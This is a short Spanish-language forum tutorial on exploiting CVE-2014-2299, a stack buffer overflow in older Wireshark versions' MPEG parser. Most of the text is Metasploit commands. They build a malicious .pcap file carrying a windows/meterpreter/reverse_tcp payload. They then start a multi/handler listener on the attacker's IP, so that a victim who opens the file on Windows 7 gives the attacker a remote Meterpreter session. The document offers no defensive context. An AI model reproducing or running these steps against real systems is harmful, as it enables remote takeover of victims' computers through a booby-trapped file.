Bug de wireshark (Explotando)






Este módulo Metasploit provoca un desbordamiento del búfer de pila en las versiones de Wireshark 1.8.12-1.10.5 y por abajo por la generación de un archivo malicioso.

Desbordamiento de búfer en la función mpeg_read en escuchas telefónicas / mpeg.c en el analizador MPEG en Wireshark 1.8.x antes de 1.8.13 y 1.10.x antes 1.10.6 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (caída de aplicación) a través de un gran récord en los datos MPEG.


Exploit

Cita:CVE-2014-2299


Atacante

Cita:kali linux
Metasploit


Victima

Cita:Windows 7 x86





Cita:use exploit/windows/fileformat/wireshark_mpeg_overflow





Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)
set target 1
exploit




Se crea un archivo (.pcap) una captura de paquetes,que causara que el wireshark falle al ejecutar
el archivo ,solo hay que abrirlo en la pc victima.






Pero antes hay que crear una conexion de handler para que cuando abramos el archivo (.pcap) se conecte a la pc atacante,configuramos nuestros parametros.





Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.154.130
exploit


Esperamos que conecte y nos da la sesión de meterpreter.